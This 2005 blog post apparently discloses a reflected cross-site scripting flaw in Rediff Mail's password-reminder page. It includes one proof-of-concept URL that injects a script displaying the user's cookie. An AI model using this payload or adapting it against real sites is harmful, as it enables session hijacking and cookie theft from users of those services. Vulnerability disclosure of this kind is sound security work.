Thursday, December 29, 2005

Rediff Mail XSS Vulnerability


I dont know why people look at XSS vulnerability as less critical. This may be an eye opener for them. This poc shows how easy it is to grab a cookie and play with it.
here is a POC:-
http://login.rediff.com/cgi-bin/subs/passwd_remind.cgi?FormName=takeusername&login=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
Thanks
SumSid

0 Comments:

Post a Comment

<< Home